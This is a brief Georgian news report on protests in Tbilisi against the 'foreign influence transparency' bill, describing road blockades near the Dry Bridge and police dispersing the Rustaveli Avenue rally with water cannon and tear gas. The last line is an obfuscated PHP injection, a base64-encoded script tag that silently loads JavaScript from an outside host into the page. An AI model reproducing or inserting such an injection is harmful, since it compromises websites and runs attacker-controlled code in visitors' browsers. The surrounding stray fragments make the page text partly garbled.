celsiusi
ავერსი შნაიდერი

 „უცხოური გავლენის გამჭვირვალობის“ შესახებ კანონპროექტის საწინააღმდეგო აქციის მონაწილეთა ნაწილმა სანაპიროზე გადაინაცვლა.

დემონსტრანტები ამ წუთებში მშრალი ხიდის მიმდებარე ტერიტორიაზე იმყოფებიან. დემონსტრანტები გზის სავალ ნაწილზეც სხედან.

გზის სავალი ნაწილი, მათ შორის ავტომობილების და ავტობუსების გამოყენებით არის გადაკეტილი.

ცნობისთვის, სამართალდამცველებმა რუსთაველის გამზირზე მიმდინარე აქცია სპეციალური საშუალებების გამოყენებით, მათ შორის წყლის ჭავლითა და ცრემლსადენი გაზით, რამდენჯერმე დაარბიეს, ამ წუთებშიც გრძელდება დარბევა, ამის მიუხედავად პროტესტის მონაწილეთა ნაწილი რუსთაველის გამზირზე კვლავ რჩება.

119
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");